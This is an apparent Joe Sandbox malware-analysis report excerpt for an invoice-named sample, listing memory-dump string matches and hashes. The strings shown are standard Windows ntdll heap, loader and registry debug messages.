                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-122214566
                                  • Opcode ID: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                  • Instruction ID: fb95ef0c225b60b6efa78ae9f4116da510c99bfbe8a7488b5b0dbc6d83161456
                                  • Opcode Fuzzy Hash: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                  • Instruction Fuzzy Hash: B3C13A71A00315BBEB148F64CC84B7EBBA5AFCA308F558069EC45AB390DFB5CA45C391
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                  • Instruction ID: 342ff69bd6ceb92e8e65b2278c546c7889bb33dfa45d7aa9b313bed36a86e272
                                  • Opcode Fuzzy Hash: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                  • Instruction Fuzzy Hash: 72F1AE74A00605EFEB19CF68C890F6AB7F5FF94344F1091A9E8459B395DB31EA81CB90
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325502BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325502E7
                                  • RTL: Re-Waiting, xrefs: 3255031E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                  • Instruction ID: d18105a63272b40c66d287ef8f58f59d3a60c7a80c800b5ae8ec050fa613a1de
                                  • Opcode Fuzzy Hash: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                  • Instruction Fuzzy Hash: D0E1C0756087419FE715CF28C880B1ABBE0BF88364F604A5EF495CB2E1DB74EA45CB42
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                  • Instruction ID: 38505dd6ce1b7d8332c85a8066426ee1f6aa3d17c5de81d54067afd6e816bbfb
                                  • Opcode Fuzzy Hash: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                  • Instruction Fuzzy Hash: EDF10676E006118BDF08CF69C99167EFFF6AF98200B59416DD856DB380EAB4EA41CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: This is located in the %s field of the heap header.$ -M2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 0-1754937585
                                  • Opcode ID: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                  • Instruction ID: 803f873d586b35b0e4d3bb37ee5fcd810fc8a8d731fb6d0a11ea17a986effce5
                                  • Opcode Fuzzy Hash: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                  • Instruction Fuzzy Hash: 2031F435101260EFEB05EB99C880F9677E8FF04B65F508499F842DB291DB70EE40DEA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                  • API String ID: 0-3061284088
                                  • Opcode ID: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                  • Instruction ID: 77d74229d5c8ed434f149dda5479f8657fcf735338769bc8fcee7dcf8c2b7104
                                  • Opcode Fuzzy Hash: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                  • Instruction Fuzzy Hash: 9701F7374066C0DEE61A9728D529F62BBE4EF42B31F2440DDF5448BA52CEB4A981CA70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                  • Instruction ID: 5d53639b9f6d2326666e77174a7ca9befacf66680302a17007f8eda785e0c3bc
                                  • Opcode Fuzzy Hash: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                  • Instruction Fuzzy Hash: E213BF74A00755AFEB15CF68C9807A9BBF1FF88304F148159D845AF381DB76A992CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UK2
                                  • API String ID: 0-235712404
                                  • Opcode ID: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                  • Instruction ID: 613eef19373aacf2e258b32dbc1f41697f452c83cc8102a9643d26a788751171
                                  • Opcode Fuzzy Hash: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                  • Instruction Fuzzy Hash: 51B1DF76A06744AFEB15CF65C880B9DF7B5BF54368F644529E852EB7A0DB30EA40CB00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UK2${
                                  • API String ID: 0-1304081954
                                  • Opcode ID: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                  • Instruction ID: 6d8d332f88385d1e556483e347fb327fdc006b6ecc986d8a298f04881de327b0
                                  • Opcode Fuzzy Hash: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                  • Instruction Fuzzy Hash: 6A91F3B5902309DFFB15CF64C940B9DB7B0FF10769F604195E852AB3A0DB789A81CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                  • API String ID: 0-2586055223
                                  • Opcode ID: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                  • Instruction ID: ec6c01214aa2de834866cd5101da27e41693be20015727f95a3767a5e92ba7f6
                                  • Opcode Fuzzy Hash: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                  • Instruction Fuzzy Hash: 7F613776245780AFE312CF24C864F5B7BE8FF84B54F050458FA548B292DB74DA42CBA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                  • API String ID: 0-1391187441
                                  • Opcode ID: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                  • Instruction ID: 6d417f8f9685f179181569e0b052ce647ebea92dc917efa3cb04f1bd9f62a238
                                  • Opcode Fuzzy Hash: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                  • Instruction Fuzzy Hash: F731C136A01654EFEB02CB49CC94F9EB7B8EF45764F144095E914EB292DB70EE40CA60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$BuildLabEx$EQ2$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 0-22242143
                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction ID: 465b639d055e42e5a969a19c44ee3131c38859e74db0bbe7dd4fe89a725e8632
                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction Fuzzy Hash: CE318D76900318BFDB119FA5CD40EDFBBB9EB84B54F508425E914A71E0EB70DB058BA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                  • Instruction ID: f1a55a46eb31524e1bd6ea3ce36fd352325b9156d7249ab76e965a074ff1f416
                                  • Opcode Fuzzy Hash: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                  • Instruction Fuzzy Hash: 8451B035A00705ABFB0ACF64CA44B6DFBB4BF44766F108169E91297390DFB49A41CB80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                  • API String ID: 0-1168191160
                                  • Opcode ID: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                  • Instruction ID: 85ba3650ae1efd0f3aeba1a9e0480a9e6375d00a8b9461b68d3563c4791d226c
                                  • Opcode Fuzzy Hash: 4a7868f7e7942b06f2e629469080a935439ed4d7cfaddc962a8b8531faf48437
                                  • Instruction Fuzzy Hash: ABF1C3B5A402289BDB20DF18CC80BD9B7B5EF54364F5480E9EA08AB240EB759FC5CF55
                                  Strings
                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324E1728
                                  • HEAP[%wZ]: , xrefs: 324E1712
                                  • HEAP: , xrefs: 324E1596
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                  • Instruction ID: c3f5a62b2f8ac844caaba2c6dab412952a04ee6d65f5ba4711ecac7ffc0628c0
                                  • Opcode Fuzzy Hash: 797ba230c142a596aafd46c5c69e28a14c0f705dc2849f3e77e42e48a3e4d34d
                                  • Instruction Fuzzy Hash: 19E1D074A047419BEB19CF28C491BBAFBF1AF48B05F14885EE99ACB345DB34E941CB50
                                  Strings
                                  • 'LDR: %s(), invalid image format of MUI file , xrefs: 32543AB4
                                  • {, xrefs: 32543ABD
                                  • LdrpLoadResourceFromAlternativeModule, xrefs: 32543AAF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                  • API String ID: 0-1697150599
                                  • Opcode ID: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                  • Instruction ID: 05bb99d247978352d6b71e5832fb1a0539f7de34e11c619958dac7b1094de623
                                  • Opcode Fuzzy Hash: e43afc8585bba7a9cb0f2c6cca1ccd746546a0e359e7b695ef523d6712aa8885
                                  • Instruction Fuzzy Hash: D6E16A746093859BF308CF14C590B6AB7E1BF84789F51892DF9869B360DB70DA46CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: %$&$@
                                  Strings
                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325BB82A
                                  • TargetNtPath, xrefs: 325BB82F
                                  • GlobalizationUserSettings, xrefs: 325BB834
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                  Strings
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3253E6C6
                                  • HEAP[%wZ]: , xrefs: 3253E6A6
                                  • HEAP: , xrefs: 3253E6B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  Strings
                                  • LdrpCompleteMapModule, xrefs: 3254A590
                                  • minkernel\ntdll\ldrmap.c, xrefs: 3254A59A
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3254A589
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  Strings
                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3258DC32
                                  • HEAP[%wZ]: , xrefs: 3258DC12
                                  • HEAP: , xrefs: 3258DC1F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                  Strings
                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3253FB63
                                  • HEAP[%wZ]: , xrefs: 3253FB4B
                                  • HEAP: , xrefs: 3253FB58
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                  Strings
                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32551B39
                                  • minkernel\ntdll\ldrtls.c, xrefs: 32551B4A
                                  • LdrpAllocateTls, xrefs: 32551B40
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                  Strings
                                  • RtlCreateActivationContext, xrefs: 325529F9
                                  • SXS: %s() passed the empty activation context data, xrefs: 325529FE
                                  • Actx , xrefs: 325133AC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                  Strings
                                  • GlobalFlag, xrefs: 3256B68F
                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3256B632
                                  • @, xrefs: 3256B670
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                  Strings
                                  • DLL "%wZ" has TLS information at %p, xrefs: 32551A40
                                  • minkernel\ntdll\ldrtls.c, xrefs: 32551A51
                                  • LdrpInitializeTls, xrefs: 32551A47
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: RtlValidateHeap
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: kLsE
                                  • API String ID: 3446177414-3058123920
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  APIs
                                  Memory Dump Source
